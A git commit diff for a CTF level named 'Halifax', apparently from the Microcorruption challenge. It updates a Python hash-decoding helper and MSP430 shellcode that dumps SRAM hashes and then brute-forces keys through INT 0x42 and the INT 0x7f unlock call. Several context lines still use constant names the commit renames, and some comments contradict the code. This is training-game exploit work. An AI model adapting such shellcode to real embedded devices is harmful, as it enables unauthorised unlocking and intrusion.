25-Halifax: Fix typo in script, update payload for clarity and INT 0x42

2024-11-21 20:36:00 +00:00 · 2023-07-04 19:23:11 -05:00 · 2023-07-04 19:23:11 -05:00 · 6515375694
commit 6515375694
parent 7dac5d6586
2 changed files with 30 additions and 48 deletions
--- a/25-Halifax/halifax.py
+++ b/25-Halifax/halifax.py
@ -50,7 +50,7 @@ def main():
        key = target[loc:loc+depth]
        try:
            value = all_hashes[key]
-            print(f"{value:x}", end="")
+            print(f"{value:02x}", end="")
        except KeyError:
            value = 0x00
--- a/25-Halifax/shellcode.asm
+++ b/25-Halifax/shellcode.asm
@ -5,9 +5,9 @@
 const:
 .define msize  0x1    ; length of each hash in bytes
 .define hsize  0x3    ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
-.define slen   0x140  ; number of bytes in sram to dump
+.define sr_len 0x140  ; number of bytes in sram to dump
-.define olen   0x3c0  ; number of bytes in hash array
+.define ha_len 0x3c0  ; number of bytes in hash array (hsize * sr_len)
-.define oaddr  0x7000 ; address of the big hash array
+.define haddr  0x7000 ; address of the big hash array
 .define iaddr  0x8000 ; address of the sram input buffer
 .define kaddr  0x9000 ; address of the key buffer
 external_data:
@ -23,37 +23,27 @@ external_func:
 .define puts            #0x4586
 ; memcpy(void *dest, void *src, size_t len)
 .define memcpy          #0x45a4
-; sha256_internal(void * sram_addr, size_t sram_len, void * sha_buf)
+; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
 .define sha256_internal #0x45b6
 ; memset(void* buf, char value, size_t length)
 .define memset          #0x45c8
 setup_variables:
 push  r4
 push  r5
 push  r6
 push  r7
 mov   #msize, r4    ; message_size
 mov   #hsize, r5    ; bytes_per_hash
 mov   #slen,  r6    ; sram_length
 mov   #olen,  r7    ; output_length
 get_sram_hashes:
 clr   r11            ; loop variable in r11
-mov   r4, r14        ; r14 = 1
+mov   #msize, r14    ; r14 = 1
-mov   #oaddr, r13    ; set destination to 0x8000
+mov   #haddr, r13    ; set destination to 0x8000
 sr_loop:
 mov   r11, r15       ; mov addr r15
 call  sha256_internal; <sha256_internal>
-add   r5, r13        ; keep 3 bytes of the output
+add   #hsize, r13    ; keep 3 bytes of the output
 inc   r11            ; inc r11
-cmp   r6, r11        ; do that 0x1000 times
+cmp   #sr_len, r11        ; do that 0x1000 times
 jnc   sr_loop
 print_hex:
 clr   r11;
 ph_loop:
-mov.b oaddr(r11), r14
+mov.b haddr(r11), r14
 mov.b r14, r15
 rra   r15            ; using rra here instead of rra.b means the value won't roll into the highest bit
 rra   r15            ; which negates the need to and 0xf, r15
@ -66,7 +56,7 @@ call  putchar        ; <putchar>
 mov.b HEX_LUT(r14), r15
 call  putchar        ; <putchar>
 inc   r11            ; inc r11
-cmp   r7, r11        ; do that sram_length*3 times
+cmp   #ha_len, r11        ; do that sram_length*3 times
 jnc   ph_loop
 mov.b #0xa, r15      ; '\n'
@ -75,43 +65,35 @@ call  #0x4578        ; putchar ('\n')
 take_input:
 ; 3e4040003f400090b0126845
-mov   r6, r14
+mov   #sr_len, r14
 mov   #iaddr, r15
 call  getsn          ; <getsn>
 check_all_passwords:
-;for i in 0..slen:
+;for i in 0..sr_len:
-clr  r9
+clr   r9
 pw_loop:
 ; memset(kaddr, 0, 0x20)
 mov  #20, r13
 clr  r14
 mov  #kaddr, r15
 call memset
 ; 	memcpy(kaddr, iaddr + i, len)
-mov  #10, r13
+mov   #10, r13
-mov  #iaddr, r14
+mov   #iaddr, r14
-add  r9, r14
+add   r9, r14
-mov  #kaddr, r15
+mov   #kaddr, r15
-call memcpy
+call  memcpy
-; sha256_internal(s_addr, len, kaddr)
+; INT (0x42, key)
-mov   #kaddr, r13    ; set buffer to 0x9000
+push  #kaddr
-mov   #0x0010, r14   ; set length to 0x10
+push  #42
-mov   r9, r15
+call  INT
-call  sha256_internal
+add   #4, sp
 ; INT(7f)
 unlock7f:
-mov   #0x7f, r15
+push  #0
 push  #0
 push  #7f
 call  INT
-
+add   #6, sp
 inc   r9
-cmp   r6, r9
+cmp   #sr_len, r9
 jl    pw_loop
-teardown_variables:
+end:
 pop   r7
 pop   r6
 pop   r5
 pop   r4
 ret